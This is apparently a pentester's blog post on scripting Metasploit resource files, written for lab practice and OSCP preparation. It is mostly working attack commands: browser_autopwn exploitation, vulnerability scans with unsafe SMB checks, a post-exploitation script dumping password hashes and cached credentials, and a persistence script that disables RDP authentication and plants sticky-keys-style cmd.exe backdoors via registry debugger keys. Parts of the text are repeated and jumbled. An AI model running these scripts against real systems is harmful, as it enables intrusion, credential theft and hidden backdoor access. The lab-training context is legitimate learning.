Scripting Metasploit
Recently, in the pwb labs, I've had to do some very repetitive tasks with Metasploit (Not familiar? Great primer) . This involved checking for a lot of low hanging fruit and being a programmer, I had to automate. I quickly started chaining tests together in resource files and saved lots of time, allowing me to go after more systems simultaneously. The following are quick scripts I threw together, they are not sick or stealth, but rather explore using resource files.
The first script quickly demos how resource files work, by setting some better initial settings on everybody's favorite, browser_autopwn :D
The following resource file initially requires the user to set RHOSTS globally using:
Where 192.168.1.1 is the target. You can also set RHOSTS to a file, to scan a list. This next script then uses global RHOSTS in multiple auxiliaries like above, without having to stop for user input. It uses db_nmap to save the scans to the database as well as using ruby to fetch the set global framework objects. Using the database in metasploit can really bring out a lot of it's functionality. Again, the trick here is setting the RHOSTS globally, allowing the user to chain commands quickly.
The last script is just a quick one for looting information from a windows machine once you compromised it with meterpreter. It's by far no winenum, but it grabs a set of information that was highly valuable to me in a quick and efficient stream, when combining it with spool. I just chain together my favorite Windows post modules and loot the victim for data. Again the fun part here is that we can automate our post-exploitation, imagine the possibilities!
There ya' have it. Three quick and easy examples of Metasploit resource scripts! Now to stock pile the armory for the OSCP exam!
Update! I have some more RC scripts for you Lockboxx fans, check them out below!
use auxiliary/admin/smb/psexec_command
set command 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
meterpreter > resource persist_windows.rc
The first script quickly demos how resource files work, by setting some better initial settings on everybody's favorite, browser_autopwn :D
:~/$ vi browser_pwn.rc
#browser_autopwn resource
use auxiliary/server/browser_autopwn
set SRVPORT 80
set URIPATH /
run
msf > resource browser_pwn.rc
The following resource file initially requires the user to set RHOSTS globally using:
setg RHOSTS 192.168.1.1
Where 192.168.1.1 is the target. You can also set RHOSTS to a file, to scan a list. This next script then uses global RHOSTS in multiple auxiliaries like above, without having to stop for user input. It uses db_nmap to save the scans to the database as well as using ruby to fetch the set global framework objects. Using the database in metasploit can really bring out a lot of it's functionality. Again, the trick here is setting the RHOSTS globally, allowing the user to chain commands quickly.
:~/$ vi scanner.rc
#low hanging fruit scanner
#launching a resource from inside a resource file
resource portscan.rc#calling ruby< ruby >run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")run_single("db_nmap -sS -Pn -n --script=ftp-vuln-cve2010-4221.nse -p 21 #{framework.datastore['RHOSTS']}")run_single("services #{framework.datastore['RHOSTS']}")run_single("vulns #{framework.datastore['RHOSTS']}")
< / ruby >
#chaining common scanners
use auxiliary/scanner/snmp/snmp_enum
run
use auxiliary/scanner/snmp/snmp_login
run
use auxiliary/scanner/snmp/snmp_enumusers
run
use auxiliary/scanner/snmp/snmp_enumshares
run
use auxiliary/scanner/nfs/nfsmount
run
use auxiliary/scanner/vnc/vnc_none_auth
run
msf > resource scanner.rc
:~/$ vi post_windows.rc
run post/windows/gather/checkvm
getuid
sysinfo
getsytem
run post/windows/gather/hashdump
run post/windows/gather/credentials/credential_collector
run post/windows/gather/cachedump
run post/windows/gather/enum_logged_on_users
idletime
run post/windows/gather/enum_applications
run post/windows/gather/dumplinks
ipconfig
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_devices
run post/windows/gather/usb_history
meterpreter > resource post_windows.rc
There ya' have it. Three quick and easy examples of Metasploit resource scripts! Now to stock pile the armory for the OSCP exam!
Update! I have some more RC scripts for you Lockboxx fans, check them out below!
:~/$ vi persist_windows.rc
set command 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f'
run
meterpreter > resource persist_windows.rc